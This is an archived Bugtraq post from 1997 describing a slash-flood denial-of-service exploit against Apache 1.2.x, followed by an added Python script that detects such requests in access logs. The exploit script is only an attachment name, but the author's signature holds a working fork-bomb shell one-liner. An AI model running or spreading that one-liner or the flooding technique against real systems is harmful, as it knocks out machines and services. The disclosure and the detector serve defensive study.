Bugtraq mailing list archives

Apache DoS attack?
From: lcamtuf () POLBOX COM (Michał Zalewski)
Date: Tue, 30 Dec 1997 11:07:04 +0100


[excuse me if it has been discovered before]

Here's a simple exploit for Apache httpd version 1.2.x (tested on 1.2.4).
When launched, it causes increases in the victim's load average and extreme
slowdowns of disk operations. On my i586 Linux an annoying slowdown was
experienced immediately (after maybe 5 seconds). After about 4 minutes
work had turned into real hell (286?).

The attached program ('beck') is a shell script. It works by sending
excessive HTTP requests with thousands of '/'s inside (parsed from the file
'beck.dat'). A single request just makes Apache think a little longer.
But when requests are sent from a loop - huh, the victim
system becomes slower and slower... At least on my machine; maybe when
Apache is running on a lightspeed workstation this script makes no
difference.

PS. A fast connection should help... It all depends on the victim system's
performance.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
=--------- [ echo "while [ -f \$0 ]; do \$0 &;done" >_;. _ ] ---------=


[Attachment: beck.zip (application/x-zip-compressed)]
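
A defender-side check for the request pattern this post describes, as an added example that is not part of the original message or the attached script: it scans Common Log Format access-log lines for request paths containing long runs of consecutive '/' and counts them per client. The sample log lines, the 100-slash and 3-hit thresholds, and the function names are constructed assumptions.

```python
import re
from collections import Counter

# Common Log Format: host ident user [time] "METHOD path PROTO" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
SLASH_RUN = re.compile(r'/+')

def longest_slash_run(path):
    """Length of the longest run of consecutive '/' in a request path."""
    return max((len(m.group()) for m in SLASH_RUN.finditer(path)), default=0)

def flag_slash_floods(lines, min_run=100, min_hits=3):
    """Return {client: hits} for clients sending >= min_hits requests whose
    path holds a run of at least min_run slashes (thresholds are assumptions)."""
    hits = Counter()
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # skip lines that are not in Common Log Format
        client, _method, path, _status = m.groups()
        if longest_slash_run(path) >= min_run:
            hits[client] += 1
    return {c: n for c, n in hits.items() if n >= min_hits}

def sample_log():
    """Constructed sample lines (documentation addresses, not real traffic)."""
    ts = '[30/Dec/1997:11:07:04 +0100]'
    flood = '/' * 2000
    lines = [f'192.0.2.10 - - {ts} "GET /index.html HTTP/1.0" 200 1043',
             f'192.0.2.10 - - {ts} "GET /docs//manual/ HTTP/1.0" 200 512',
             f'198.51.100.7 - - {ts} "GET {flood} HTTP/1.0" 200 1043']
    lines += [f'203.0.113.5 - - {ts} "GET {flood}x HTTP/1.0" 404 0'] * 5
    return lines

if __name__ == "__main__":
    for client, n in flag_slash_floods(sample_log()).items():
        print(f"{client}: {n} requests with >=100 consecutive slashes")
```

The per-client count separates a looped sender from a single malformed request; tune both thresholds against the site's normal URLs before alerting on them.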


